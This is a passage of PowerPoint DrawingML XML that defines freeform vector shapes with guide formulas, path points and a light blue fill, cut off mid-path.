                  <a:gd name="T61" fmla="*/ 52 h 70"/>
                  <a:gd name="T62" fmla="*/ 4 w 115"/>
                  <a:gd name="T63" fmla="*/ 58 h 70"/>
                  <a:gd name="T64" fmla="*/ 0 w 115"/>
                  <a:gd name="T65" fmla="*/ 47 h 70"/>
                  <a:gd name="T66" fmla="*/ 7 w 115"/>
                  <a:gd name="T67" fmla="*/ 36 h 70"/>
                  <a:gd name="T68" fmla="*/ 11 w 115"/>
                  <a:gd name="T69" fmla="*/ 21 h 70"/>
                  <a:gd name="T70" fmla="*/ 22 w 115"/>
                  <a:gd name="T71" fmla="*/ 15 h 70"/>
                  <a:gd name="T72" fmla="*/ 26 w 115"/>
                  <a:gd name="T73" fmla="*/ 13 h 70"/>
                  <a:gd name="T74" fmla="*/ 34 w 115"/>
                  <a:gd name="T75" fmla="*/ 24 h 70"/>
                  <a:gd name="T76" fmla="*/ 40 w 115"/>
                  <a:gd name="T77" fmla="*/ 35 h 70"/>
                  <a:gd name="T78" fmla="*/ 53 w 115"/>
                  <a:gd name="T79" fmla="*/ 31 h 70"/>
                  <a:gd name="T80" fmla="*/ 53 w 115"/>
                  <a:gd name="T81" fmla="*/ 10 h 70"/>
                  <a:gd name="T82" fmla="*/ 55 w 115"/>
                  <a:gd name="T83" fmla="*/ 6 h 70"/>
                  <a:gd name="T84" fmla="*/ 60 w 115"/>
                  <a:gd name="T85" fmla="*/ 3 h 70"/>
                  <a:gd name="T86" fmla="*/ 63 w 115"/>
                  <a:gd name="T87" fmla="*/ 2 h 70"/>
                  <a:gd name="T88" fmla="*/ 67 w 115"/>
                  <a:gd name="T89" fmla="*/ 0 h 70"/>
                  <a:gd name="T90" fmla="*/ 68 w 115"/>
                  <a:gd name="T91" fmla="*/ 2 h 70"/>
                  <a:gd name="T92" fmla="*/ 70 w 115"/>
                  <a:gd name="T93" fmla="*/ 1 h 70"/>
                  <a:gd name="T94" fmla="*/ 74 w 115"/>
                  <a:gd name="T95" fmla="*/ 5 h 70"/>
                  <a:gd name="T96" fmla="*/ 77 w 115"/>
                  <a:gd name="T97" fmla="*/ 6 h 70"/>
                  <a:gd name="T98" fmla="*/ 81 w 115"/>
                  <a:gd name="T99" fmla="*/ 9 h 70"/>
                  <a:gd name="T100" fmla="*/ 84 w 115"/>
                  <a:gd name="T101" fmla="*/ 13 h 70"/>
                  <a:gd name="T102" fmla="*/ 88 w 115"/>
                  <a:gd name="T103" fmla="*/ 15 h 70"/>
                  <a:gd name="T104" fmla="*/ 91 w 115"/>
                  <a:gd name="T105" fmla="*/ 15 h 70"/>
                  <a:gd name="T106" fmla="*/ 94 w 115"/>
                  <a:gd name="T107" fmla="*/ 13 h 70"/>
                  <a:gd name="T108" fmla="*/ 98 w 115"/>
                  <a:gd name="T109" fmla="*/ 16 h 70"/>
                  <a:gd name="T110" fmla="*/ 102 w 115"/>
                  <a:gd name="T111" fmla="*/ 16 h 70"/>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115"/>
                  <a:gd name="T169" fmla="*/ 0 h 70"/>
                  <a:gd name="T170" fmla="*/ 115 w 115"/>
                  <a:gd name="T171" fmla="*/ 70 h 70"/>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115" h="70">
                    <a:moveTo>
                      <a:pt x="102" y="16"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="105" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="16"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36105" name="Freeform 238"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3071" y="1808"/>
                <a:ext cx="115" cy="70"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 105 w 115"/>
                  <a:gd name="T1" fmla="*/ 18 h 70"/>
                  <a:gd name="T2" fmla="*/ 108 w 115"/>
                  <a:gd name="T3" fmla="*/ 21 h 70"/>
                  <a:gd name="T4" fmla="*/ 110 w 115"/>
                  <a:gd name="T5" fmla="*/ 24 h 70"/>
                  <a:gd name="T6" fmla="*/ 109 w 115"/>
                  <a:gd name="T7" fmla="*/ 28 h 70"/>
                  <a:gd name="T8" fmla="*/ 108 w 115"/>
                  <a:gd name="T9" fmla="*/ 29 h 70"/>
                  <a:gd name="T10" fmla="*/ 107 w 115"/>
                  <a:gd name="T11" fmla="*/ 34 h 70"/>
                  <a:gd name="T12" fmla="*/ 108 w 115"/>
                  <a:gd name="T13" fmla="*/ 35 h 70"/>
                  <a:gd name="T14" fmla="*/ 110 w 115"/>
                  <a:gd name="T15" fmla="*/ 36 h 70"/>
                  <a:gd name="T16" fmla="*/ 110 w 115"/>
                  <a:gd name="T17" fmla="*/ 39 h 70"/>
                  <a:gd name="T18" fmla="*/ 112 w 115"/>
                  <a:gd name="T19" fmla="*/ 43 h 70"/>
                  <a:gd name="T20" fmla="*/ 114 w 115"/>
                  <a:gd name="T21" fmla="*/ 46 h 70"/>
                  <a:gd name="T22" fmla="*/ 115 w 115"/>
                  <a:gd name="T23" fmla="*/ 53 h 70"/>
                  <a:gd name="T24" fmla="*/ 114 w 115"/>
                  <a:gd name="T25" fmla="*/ 56 h 70"/>
                  <a:gd name="T26" fmla="*/ 110 w 115"/>
                  <a:gd name="T27" fmla="*/ 59 h 70"/>
                  <a:gd name="T28" fmla="*/ 107 w 115"/>
                  <a:gd name="T29" fmla="*/ 62 h 70"/>
                  <a:gd name="T30" fmla="*/ 104 w 115"/>
                  <a:gd name="T31" fmla="*/ 67 h 70"/>
                  <a:gd name="T32" fmla="*/ 99 w 115"/>
                  <a:gd name="T33" fmla="*/ 65 h 70"/>
                  <a:gd name="T34" fmla="*/ 94 w 115"/>
                  <a:gd name="T35" fmla="*/ 68 h 70"/>
                  <a:gd name="T36" fmla="*/ 91 w 115"/>
                  <a:gd name="T37" fmla="*/ 69 h 70"/>
                  <a:gd name="T38" fmla="*/ 85 w 115"/>
                  <a:gd name="T39" fmla="*/ 68 h 70"/>
                  <a:gd name="T40" fmla="*/ 81 w 115"/>
                  <a:gd name="T41" fmla="*/ 62 h 70"/>
                  <a:gd name="T42" fmla="*/ 72 w 115"/>
                  <a:gd name="T43" fmla="*/ 56 h 70"/>
                  <a:gd name="T44" fmla="*/ 64 w 115"/>
                  <a:gd name="T45" fmla="*/ 52 h 70"/>
                  <a:gd name="T46" fmla="*/ 61 w 115"/>
                  <a:gd name="T47" fmla="*/ 49 h 70"/>
                  <a:gd name="T48" fmla="*/ 54 w 115"/>
                  <a:gd name="T49" fmla="*/ 52 h 70"/>
                  <a:gd name="T50" fmla="*/ 48 w 115"/>
                  <a:gd name="T51" fmla="*/ 51 h 70"/>
                  <a:gd name="T52" fmla="*/ 39 w 115"/>
                  <a:gd name="T53" fmla="*/ 50 h 70"/>
                  <a:gd name="T54" fmla="*/ 34 w 115"/>
                  <a:gd name="T55" fmla="*/ 51 h 70"/>
                  <a:gd name="T56" fmla="*/ 31 w 115"/>
                  <a:gd name="T57" fmla="*/ 49 h 70"/>
                  <a:gd name="T58" fmla="*/ 22 w 115"/>
                  <a:gd name="T59" fmla="*/ 49 h 70"/>
                  <a:gd name="T60" fmla="*/ 10 w 115"/>
                  <a:gd name="T61" fmla="*/ 52 h 70"/>
                  <a:gd name="T62" fmla="*/ 4 w 115"/>
                  <a:gd name="T63" fmla="*/ 58 h 70"/>
                  <a:gd name="T64" fmla="*/ 0 w 115"/>
                  <a:gd name="T65" fmla="*/ 47 h 70"/>
                  <a:gd name="T66" fmla="*/ 7 w 115"/>
                  <a:gd name="T67" fmla="*/ 36 h 70"/>
                  <a:gd name="T68" fmla="*/ 11 w 115"/>
                  <a:gd name="T69" fmla="*/ 21 h 70"/>
                  <a:gd name="T70" fmla="*/ 22 w 115"/>
                  <a:gd name="T71" fmla="*/ 15 h 70"/>
                  <a:gd name="T72" fmla="*/ 26 w 115"/>
                  <a:gd name="T73" fmla="*/ 13 h 70"/>
                  <a:gd name="T74" fmla="*/ 34 w 115"/>
                  <a:gd name="T75" fmla="*/ 24 h 70"/>
                  <a:gd name="T76" fmla="*/ 40 w 115"/>
                  <a:gd name="T77" fmla="*/ 35 h 70"/>
                  <a:gd name="T78" fmla="*/ 53 w 115"/>
                  <a:gd name="T79" fmla="*/ 31 h 70"/>
                  <a:gd name="T80" fmla="*/ 53 w 115"/>
                  <a:gd name="T81" fmla="*/ 10 h 70"/>
                  <a:gd name="T82" fmla="*/ 55 w 115"/>
                  <a:gd name="T83" fmla="*/ 6 h 70"/>
                  <a:gd name="T84" fmla="*/ 60 w 115"/>
                  <a:gd name="T85" fmla="*/ 3 h 70"/>
                  <a:gd name="T86" fmla="*/ 63 w 115"/>
                  <a:gd name="T87" fmla="*/ 2 h 70"/>
                  <a:gd name="T88" fmla="*/ 67 w 115"/>
                  <a:gd name="T89" fmla="*/ 0 h 70"/>
                  <a:gd name="T90" fmla="*/ 68 w 115"/>
                  <a:gd name="T91" fmla="*/ 2 h 70"/>
                  <a:gd name="T92" fmla="*/ 70 w 115"/>
                  <a:gd name="T93" fmla="*/ 1 h 70"/>
                  <a:gd name="T94" fmla="*/ 74 w 115"/>
                  <a:gd name="T95" fmla="*/ 5 h 70"/>
                  <a:gd name="T96" fmla="*/ 77 w 115"/>
                  <a:gd name="T97" fmla="*/ 6 h 70"/>
                  <a:gd name="T98" fmla="*/ 81 w 115"/>
                  <a:gd name="T99" fmla="*/ 9 h 70"/>
                  <a:gd name="T100" fmla="*/ 84 w 115"/>
                  <a:gd name="T101" fmla="*/ 13 h 70"/>
                  <a:gd name="T102" fmla="*/ 88 w 115"/>
                  <a:gd name="T103" fmla="*/ 15 h 70"/>
                  <a:gd name="T104" fmla="*/ 91 w 115"/>
                  <a:gd name="T105" fmla="*/ 15 h 70"/>
                  <a:gd name="T106" fmla="*/ 94 w 115"/>
                  <a:gd name="T107" fmla="*/ 13 h 70"/>
                  <a:gd name="T108" fmla="*/ 98 w 115"/>
                  <a:gd name="T109" fmla="*/ 16 h 70"/>
                  <a:gd name="T110" fmla="*/ 102 w 115"/>
                  <a:gd name="T111" fmla="*/ 16 h 70"/>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115"/>
                  <a:gd name="T169" fmla="*/ 0 h 70"/>
                  <a:gd name="T170" fmla="*/ 115 w 115"/>
                  <a:gd name="T171" fmla="*/ 70 h 70"/>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115" h="70">
                    <a:moveTo>
                      <a:pt x="102" y="16"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="105" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="51"/>
